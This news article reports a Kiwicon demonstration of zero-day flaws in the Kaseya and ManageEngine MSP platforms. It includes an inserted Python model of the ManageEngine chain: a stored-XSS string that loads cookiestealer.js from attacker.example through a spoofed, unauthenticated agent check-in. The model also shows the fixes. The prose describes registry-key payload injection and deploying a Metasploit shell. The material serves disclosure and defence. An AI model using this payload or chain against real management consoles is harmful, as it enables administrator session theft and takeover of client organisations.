Researcher owns blue chip managed service platforms

Powered by SC Magazine

Zero day dropped at #Kiwicon.


A security researcher has found zero-day vulnerabilities granting administrative access to managed service provider (MSP) platforms used by the likes of Ferrari, the US Air Force and government agencies.

The flaws existed in the MSP platforms sold by Kaseya and ManageEngine and were revealed in a demonstration given at the Kiwicon 6 security conference in Wellington.

SC contacted the companies for comment.


Kaseya president Mark Sutherland said the company was investigating the flaw.

"Kaseya always welcomes hearing directly from anyone who thinks they have found a hole, or have shown an exploit (as in this case), or is just worried about security of our system," Sutherland told SC.

"We take this extremely seriously and drop everything to remediate the problem as soon as we hear of it. Typically we get a patch out within a day or two."

The security researcher, name withheld, also described a recently-patched vulnerability in N-Central which granted similar admin access.

“If you drink the Kool-Aid, MSPs will also do you software deployment, endpoint security and backup – so if you own this, you basically can destroy an organisation from the inside-out,” he said.

In the demonstration, the researcher created an administrator account on Kaseya by injecting a malicious payload into a registry key read by the Kaseya agent. The platform accepted it because of a vulnerability in which it failed to validate agent-supplied data before writing it to its database.

"The way we inject our code is by modifying the registry key," he said, to laughs from the audience followed by applause as a new admin account was successfully created.

“It's a SaaS (Software-as-a-Service) model, so you'll be able to get plenty of shells."

The demonstration of the ManageEngine vulnerability failed during the presentation, but the researcher said the exploit worked and the vulnerability had not been patched.

It worked by spoofing agent registration in version six of the MSPCentre Plus agent.

“The agent processes a single unauthenticated GET request with no signature, nothing, and – had [the demo] worked – we would have injected our XSS (Cross Site Scripting) string, gone back to the agent console, refreshed the page which makes a call back to our cookiestealer.js, load that and post it back to the server where I'd get the cookie string and then copy the cookie into Firefox," he said.

“I would have also shown uploading a Metasploit payload to that machine and getting back a system shell because the machine manages itself – and you can just do a software deployment task to deploy the Metasploit shell to it.”
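Both demonstrations rest on the same design flaw: a management server that stores whatever an agent reports, without authenticating the agent or validating the field, and a console that later renders that data to a logged-in administrator. As an added illustration (not the researcher's exploit code, and not the code of any vendor named in this article), the following Python model reproduces that pattern for the ManageEngine case and shows the two checks that close it. The console URL, the query parameter names, the per-agent key and the attacker.example host are assumptions; the cookiestealer.js reference is the one the researcher described.

```python
import hmac
import html
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Hypothetical in-memory model of an MSP agent console (constructed for this
# article; not Kaseya, ManageEngine or N-central code). Agents check in over a
# single GET request and the console lists them in an HTML table viewed by an
# administrator who is logged in.

# The stored-XSS string: the console page would load the attacker's script,
# which in the talk posted document.cookie back to the attacker's server.
XSS_PAYLOAD = '<script src="http://attacker.example/cookiestealer.js"></script>'


class AgentConsole:
    def __init__(self, authenticate_agents: bool):
        # authenticate_agents=False models the flaw described in the talk:
        # any unauthenticated GET is accepted and stored verbatim.
        self.authenticate_agents = authenticate_agents
        self.agents = {}  # agent_id -> reported hostname (the "database")
        # Per-agent secrets provisioned out of band at install time (constructed).
        self.agent_keys = {"agent-001": "c0ffee-provisioned-secret"}

    def checkin(self, url: str) -> bool:
        """Handle an agent check-in GET. Returns True if the record was stored."""
        q = parse_qs(urlparse(url).query)
        agent_id = q.get("id", [""])[0]
        hostname = q.get("hostname", [""])[0]
        if self.authenticate_agents:
            # 1. The request must prove it comes from a provisioned agent.
            key = q.get("key", [""])[0]
            expected = self.agent_keys.get(agent_id, "")
            if not expected or not hmac.compare_digest(key, expected):
                return False
            # 2. Agent-supplied fields are checked against a strict allow-list
            #    before they reach the database, so markup never gets stored.
            if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}", hostname):
                return False
        self.agents[agent_id] = hostname
        return True

    def render_vulnerable(self) -> str:
        """Console page that interpolates stored fields raw: stored XSS."""
        rows = (f"<tr><td>{a}</td><td>{h}</td></tr>" for a, h in self.agents.items())
        return "<table>" + "".join(rows) + "</table>"

    def render_hardened(self) -> str:
        """Same page with output encoding, the last line of defence."""
        rows = (f"<tr><td>{html.escape(a)}</td><td>{html.escape(h)}</td></tr>"
                for a, h in self.agents.items())
        return "<table>" + "".join(rows) + "</table>"


def checkin_url(agent_id: str, hostname: str, key: str = "") -> str:
    """Build the single GET an agent (or an attacker spoofing one) would send."""
    params = {"id": agent_id, "hostname": hostname}
    if key:
        params["key"] = key
    return "http://console.example/agent/checkin?" + urlencode(params)


def run_demo() -> dict:
    results = {}
    # Unauthenticated console: the spoofed registration lands in the database
    # and the script tag is rendered into the administrator's page.
    weak = AgentConsole(authenticate_agents=False)
    results["weak_accepted"] = weak.checkin(checkin_url("agent-999", XSS_PAYLOAD))
    results["weak_page_has_script"] = "<script" in weak.render_vulnerable()
    # Output encoding alone neutralises the script, but the bogus record stays.
    results["weak_escaped_has_script"] = "<script" in weak.render_hardened()
    # Authenticated console: the spoof is rejected, and even a genuine agent
    # cannot smuggle markup through the hostname field.
    strong = AgentConsole(authenticate_agents=True)
    results["strong_rejects_spoof"] = not strong.checkin(
        checkin_url("agent-999", XSS_PAYLOAD))
    results["strong_rejects_markup"] = not strong.checkin(
        checkin_url("agent-001", XSS_PAYLOAD, key="c0ffee-provisioned-secret"))
    results["strong_accepts_valid"] = strong.checkin(
        checkin_url("agent-001", "ws-finance-07.corp.example", key="c0ffee-provisioned-secret"))
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The order of the checks matters: authentication first, so an unregistered host cannot even reach the validation code, then input validation at write time, then output encoding at render time. The researcher's chain needed only the first two to be missing; the third is what turns an accepted junk record into a stolen administrator session.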

Exploiting the since-patched vulnerability in N-central required a user to be logged in but no user interaction. It targeted the agent's recovery “rescue me” function, and allowed an attacker to tunnel in.

Copyright © SC Magazine, Australia
